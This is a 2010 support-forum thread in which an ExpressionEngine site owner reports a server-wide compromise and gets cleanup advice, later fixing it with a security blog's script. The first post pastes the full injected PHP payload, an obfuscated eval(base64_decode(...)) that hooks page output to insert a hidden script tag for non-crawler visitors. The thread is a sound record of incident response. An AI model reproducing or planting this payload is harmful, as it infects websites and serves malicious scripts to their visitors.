EllisLab text mark
Advanced Search
     
Site was compromised with Malware! What do I do now?
Posted: 28 June 2010 11:48 AM
Joined: 2007-11-23
56 posts

To my surprise I woke up on Sunday morning to find that everyone of my sites on my server had been compromised with malware that placed a chuck of .php code in EVERY php template on my server. I have 11 EE sites on my server, so as you can guess inside of each of all those folders is LOTS of php files. you can see the code below

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5a2IyMWhhVzVoYldWaGRDNWpZeTlxY3pJdWNHaHdJajQ4TDNOamNtbHdkRDQ9Iik7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?> 


This caused my sites to really look screwed up. My question is what do I do now? I can’t go in and delete this on every template that would take days.

Any ideas?

 
Posted: 28 June 2010 12:40 PM   [ # 1 ]   [ Rating: 0 ]
Avatar
Joined: 2009-07-21
99 posts

If the piece of code is identical in each template can you not search and replace across files in something like Textmate or CODA. Of course the first thing to do is to establish how it got there…

 
Posted: 28 June 2010 03:42 PM   [ # 2 ]   [ Rating: 0 ]
Avatar
Joined: 2004-05-15
29075 posts

Thank your for reporting this, jasonathopi. We take security very seriously and will do our best to work with you on figuring out what’s going on. To that, we need some additional information from you. What version and build of EE are you using? Are there any other third-party scripts installed on your account, they may be in use or not (phpBB, WordPress ...)

I presume this is a shared hosting environment? Do tell your host about it as a matter of urgency. They can help us to determine the nature of this attack, whether they compromised some other script, it was a simple directory traversal attack, a stolen or cracked FTP password, etc.

While we work through this, please also check the following files:

- path.php
- config.php
- index.php

to make sure that there is no unusual code such as iFrames or Javascript includes; it might be a good idea to replace all your files with a freshly downloaded set from expressionengine.com, upgrading to the latest build in the process.

Please ensure that you report this to your host immediately as only they can help us identify where the attack originated from so that steps can be taken to prevent this in the future.

 
Posted: 28 June 2010 10:15 PM   [ # 3 ]   [ Rating: 0 ]
Joined: 2007-11-23
56 posts

I have contacted my host and that told me that they couldn’t trace where it came from. I have had old WP installs on my server before but I don’t now where this hack came from.

In te meantime I have tried to fix a few of the sites, but I am having some major issues across the board. Using Dreamweaver’s Find and Replace (coda only does 1 folder at a time) I took the code out of the templates. Also I have installed new EE files, but now…

1. The stylesheet is not being rendered as CSS, if you access the stylesheet being referenced in the html header, you will see the css code, but it is not being displayed as CSS. (you can see an example here) Obviously because of this my site has no style to it (you can see that here) I have read some other forums about the issue maybe being in my path.php file, but my path.php file is exactly the same as working sites that I have on other servers.

2. After logging into the system/index.php I get a blank white page with “index.php?S=0&C=login&M=auth” at the end of my url every time on every site I’m trying to fix. I have uploaded new system folders many times with no luck.

here is my path file (“admin” is my “system”)

<?php

// ------------------------------------------------------
// DO NOT ALTER THIS FILE UNLESS YOU HAVE A REASON TO

// ------------------------------------------------------
// Path to the directory containing your backend files

$system_path "./admin/";

// ------------------------------------------------------
// MANUALLY CONFIGURABLE VARIABLES
// See user guide for more information
// ------------------------------------------------------

$template_group "";
$template "";
$site_url "";
$site_index "";
$site_404 "";
$global_vars = array(); // This array must be associative

?> 

For what it’s worth (it may be nothing) but when I pull up any of the websites (with not style) and I right-click and select “view source” there is a big “empty” space at the top of my code, where the hacked .php code used to be ever though there are no empty space while I am editing all the files. it may be nothing but it is odd.

I am running a few extensions such as LG Entension, WYGWAM, and FieldFrame, I’m not sure how to disable them without being able to get into my cp

I am really getting desperate needing to fix these sites for my clients.

Any ideas for this issues?

 
Posted: 28 June 2010 10:49 PM   [ # 4 ]   [ Rating: 0 ]
Joined: 2007-11-23
56 posts

GOOD NEWS! Everything is working. I could’ve wasted alot of time trying to find how deep this compromise ran, but I came across this site

http://blog.sucuri.net/2010/06/bluehost-ceo-blog-and-others-exploited-by-domainameat-cc.html

and it talked about how many sites with my hosting provider were hacked this weekend. This provides a script that will fix it instantly for you.

I’m going to start a new thread in case anyone else got hacked this weekend.

 
Posted: 28 June 2010 10:51 PM   [ # 5 ]   [ Rating: 0 ]
Joined: 2007-11-23
56 posts

If you have an EE site hosted on Bluehost you may have got hacked this weekend with malware. After HOURS of trying to fix this I found this site and it fixed everything instantly:

http://blog.sucuri.net/2010/06/bluehost-ceo-blog-and-others-exploited-by-domainameat-cc.html

Your Welcome….

 
Posted: 29 June 2010 02:02 AM   [ # 6 ]   [ Rating: 0 ]
Avatar
Joined: 2004-03-22
12308 posts

jasonathopi,

I merged your new thread with this one to put it all in context. Thanks for following up on this. I am going to close this one out. Feel free to start a new thread if you have any more questions.

 Signature 

John Henry’s Website | Follow me on Twitter